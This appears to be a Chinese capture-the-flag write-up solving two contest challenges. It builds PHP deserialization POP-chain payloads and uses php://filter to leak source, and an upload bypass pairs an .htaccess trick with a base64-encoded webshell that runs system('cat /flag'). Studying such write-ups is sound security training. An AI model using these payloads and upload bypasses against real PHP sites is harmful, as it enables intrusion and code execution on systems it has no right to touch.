【古剑杯】

[古剑山]unse方法一

考点:php反序列化、php伪协议

解题步骤:

打开题目界面

直接访问当前目录的test.php,没有返回结果,看到include函数,可以结合php伪协议读取出test.php的源码

解密后

Bash 复制代码
<?php  
    $test = "Hello world";

include "flag.php";


function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun { 
    private $a; 
    function __wakeup(){ 
        $temp = $this->a . 'ctf'; 
    } 
} 

class bfun { 
    private $items = array(); 
    public function __toString() { 
        $item = $this->items; 
        $str = $item['dd']->knife; 
        return 'what the good?'; 
    } 
} 

class cfun { 
    private $params = array(); 
    public function __get($key) {  
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}
a

然后根据上面的php代码,我们进行构造pop链

Bash 复制代码
<?php
class afun {
    private $a;

    function __construct($b){
        $this->a=$b;
    }
    function __wakeup(){
        $temp = $this->a . 'ctf';  //这里可以触发__toString()函数
    }
}

class bfun {
    private $items = array();
    function __construct($b){
        $this->items=$b;
    }
    public function __toString() {
        $item = $this->items;
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}

class cfun {
    private $params = array();
    function __construct($b){
        $this->params=$b;
    }
    public function __get($key) {
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp);
    }
}

$c=new cfun(array('knife'=>'flag'));
$b=new bfun(array('dd'=>$c));
$a=new afun($b);
//$c=new cfun();
echo urlencode(serialize($a));

payload如下

Bash 复制代码
O%3A4%3A%22afun%22%3A1%3A%7Bs%3A7%3A%22%00afun%00a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A11%3A%22%00bfun%00items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A12%3A%22%00cfun%00params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

执行即可获得flag

Bash 复制代码
http://39.108.66.86:38076/?yourcode=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A7%3A%22%00afun%00a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A11%3A%22%00bfun%00items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A12%3A%22%00cfun%00params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

[古剑山]unse 方法二

考点:php反序列化、php伪协议

解题步骤:

index.php

Java 复制代码
<?php
    include("./test.php");
    if(isset($_GET['fun'])){
        if(justafun($_GET['fun'])){
            include($_GET['fun']);
        }
    }else{
        unserialize($_GET['yourcode']);
    }
    highlight_file(__FILE__);
?>

伪协议读test.php

Java 复制代码
<?php  
    $test = "Hello world";

include "flag.php";

function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun { 
    private $a; 
    function __wakeup(){ 
        echo 1;
        $temp = $this->a . 'ctf'; 
    } 
} 

class bfun { 
    private $items = array(); 
    public function __toString() { 
        echo 2;
        $item = $this->items; 
        $str = $item['dd']->knife; 
        return 'what the good?'; 
    } 
} 

class cfun { 
    private $params = array(); 
    public function __get($key) {  
        echo 3;
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}

pop链读$flag

Java 复制代码
<?php  
class afun { 
    private $a; 
        function __construct($a){
            $this->a=$a;
        }
} 

class bfun { 
    private $items = array(); 
        function __construct($a){
            $this->items['dd']=$a;
        }
} 

class cfun { 
    private $params = array(); 
        function __construct(){
            $this->params['knife']='flag';
        }
}

$c=new cfun;
$b=new bfun($c);
$a=new afun($b);
echo urlencode(serialize($a));

?>

[古剑山]upload_2_shell

考点:文件上传.htaccess解析漏洞,exif_imagetype函数绕过

解题步骤:

参考:https://blog.csdn.net/m0_62879498/article/details/125122900

.htaccess在头部定义图片大小来绕过exif_imagetype函数(报错处有提示),然后过滤了<?也可以结合.htaccess base64编码绕过

PHP 复制代码
#define width 1000
#define height 1000 
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=./1.png"

1.png(GIF89a后面要加个12才能成功,为了匹配base64解码不乱吗)

Plain 复制代码
GIF89a12PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==
相关推荐
亚远景aspice1 小时前
ISO 21434标准:汽车网络安全管理的利与弊
网络·web安全·汽车
HackKong3 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
打码人的日常分享3 小时前
商用密码应用安全性评估,密评整体方案,密评管理测评要求和指南,运维文档,软件项目安全设计相关文档合集(Word原件)
运维·安全·web安全·系统安全·规格说明书
爱吃奶酪的松鼠丶3 小时前
Web安全之XSS攻击的防范
安全·web安全·xss
.Ayang5 小时前
tomcat 后台部署 war 包 getshell
java·计算机网络·安全·web安全·网络安全·tomcat·网络攻击模型
Hacker_Oldv5 小时前
开放性实验——网络安全渗透测试
安全·web安全
东方隐侠安全团队-千里7 小时前
网安瞭望台第3期:俄黑客 TAG - 110组织与密码攻击手段分享
网络·chrome·web安全·网络安全
速盾cdn8 小时前
速盾:CDN缓存的工作原理是什么?
网络·安全·web安全
网络安全-杰克9 小时前
网络安全概论
网络·web安全·php